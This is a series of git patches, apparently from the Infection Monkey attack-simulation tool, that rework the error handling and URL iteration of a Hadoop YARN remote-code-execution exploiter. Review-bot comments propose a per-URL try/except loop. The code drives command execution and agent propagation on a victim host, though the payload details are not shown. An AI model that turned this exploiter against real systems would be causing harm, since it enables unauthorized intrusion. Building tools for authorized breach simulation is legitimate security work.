--git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index f9a186bd5..c39533a3a 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py 
@@ -51,11 +51,13 @@ class HadoopExploiter(WebRCE): super(HadoopExploiter, self).__init__() def _exploit_host(self): - # Try to get exploitable url - urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) - self.add_vulnerable_urls(urls, True) - if not self.vulnerable_urls: - self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}" + # Try to get potential urls + potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) + if not potential_urls: + self.exploit_result.error_message = ( + f"No potential exploitable urls has been found for {self.host}" + ) + self._publish_exploitation_event(False, error_message=self.exploit_result.error_message) return self.exploit_result monkey_path_on_victim = get_agent_dst_path(self.host) @@ -65,18 +67,12 @@ class HadoopExploiter(WebRCE): ) command = self._build_command(monkey_path_on_victim, http_path) - timestamp = time() try: - if self.exploit(self.vulnerable_urls[0], command): + if self.exploit(potential_urls[0], command): self.add_executed_cmd(command) self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - - except requests.RequestException as err: - error_message = str(err) - self._publish_exploitation_event(timestamp, False, error_message=error_message) - self._publish_propagation_event(timestamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() From 66f5d7a86a166e5fe932dd329baf4a8892ec23b4 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Fri, 7 Oct 2022 08:35:24 -0400 Subject: [PATCH 16/17] Agent: Remove errant exploitation event from hadoop If no potential URLs are found, then no exploit is attempted, so there's no reason to publish an ExploitationEvent. --- monkey/infection_monkey/exploit/hadoop.py | 1 - 1 file changed, 1 deletion(-) 
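Review bot: Dropping the `except requests.RequestException` block in the `@@ -65,18 +67,12 @@` hunk leaves `_exploit_host` with no handler around `self.exploit(potential_urls[0], command)`, while the same change stops pre-screening URLs with `add_vulnerable_urls`, so the common case of a closed port in `HADOOP_PORTS` now surfaces as a `requests.ConnectionError` that leaves `_exploit_host` (the `finally` still stops the transfer thread) with no failure event published and `exploit_result.error_message` unset. A minimal fix is `try: exploited = self.exploit(potential_urls[0], command)` followed by `except requests.RequestException as err: self._publish_exploitation_event(time(), False, error_message=str(err))` and a `return self.exploit_result`, ahead of the existing success branch. The `if not potential_urls:` guard is probably dead because `build_potential_urls` is fed the constant `HADOOP_PORTS`, though that helper is not in the diff; if it is kept, `"No potential exploitable urls have been found for ..."` reads better than "has".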
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index c39533a3a..aeb70513e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -57,7 +57,6 @@ class HadoopExploiter(WebRCE): self.exploit_result.error_message = ( f"No potential exploitable urls has been found for {self.host}" ) - self._publish_exploitation_event(False, error_message=self.exploit_result.error_message) return self.exploit_result monkey_path_on_victim = get_agent_dst_path(self.host) From 7a664218bda857ee3a5e9be963dcce6fe38ea450 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Fri, 7 Oct 2022 14:53:19 +0200 Subject: [PATCH 17/17] Agent: Check all potential urls in Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index aeb70513e..f2a65b563 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -67,11 +67,12 @@ class HadoopExploiter(WebRCE): command = self._build_command(monkey_path_on_victim, http_path) try: - - if self.exploit(potential_urls[0], command): - self.add_executed_cmd(command) - self.exploit_result.exploitation_success = True - self.exploit_result.propagation_success = True + for url in potential_urls: + if self.exploit(url, command): + self.add_executed_cmd(command) + self.exploit_result.exploitation_success = True + self.exploit_result.propagation_success = True + break finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop()
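Review bot: The new loop in the `@@ -67,11 +67,12 @@` hunk tries every candidate URL, but nothing inside it catches what `exploit()` raises, and since an earlier commit in this series removed the `except requests.RequestException` handler, the first closed port in `HADOOP_PORTS` raises `requests.ConnectionError` out of `_exploit_host` before the remaining URLs are tried; a non-YARN service answering with a non-JSON body raises `ValueError`/`KeyError` from the `json.loads` and `["application-id"]` lookups in `exploit()` (visible in earlier patches of this series) with the same effect. Each iteration should catch those, publish a failure event so the attempt is recorded, and continue to the next URL. `_exploit_host` starts before this hunk; the `finally` that stops the transfer thread is unchanged.
```python
for url in potential_urls:
    try:
        exploited = self.exploit(url, command)
    except (requests.RequestException, ValueError, KeyError) as err:
        # A closed port or a non-YARN service on one candidate must not abort the rest.
        self._publish_exploitation_event(time(), False, error_message=f"{url}: {err}")
        continue
    if exploited:
        self.add_executed_cmd(command)
        self.exploit_result.exploitation_success = True
        self.exploit_result.propagation_success = True
        break
# … unchanged: finally block joining and stopping http_thread …
```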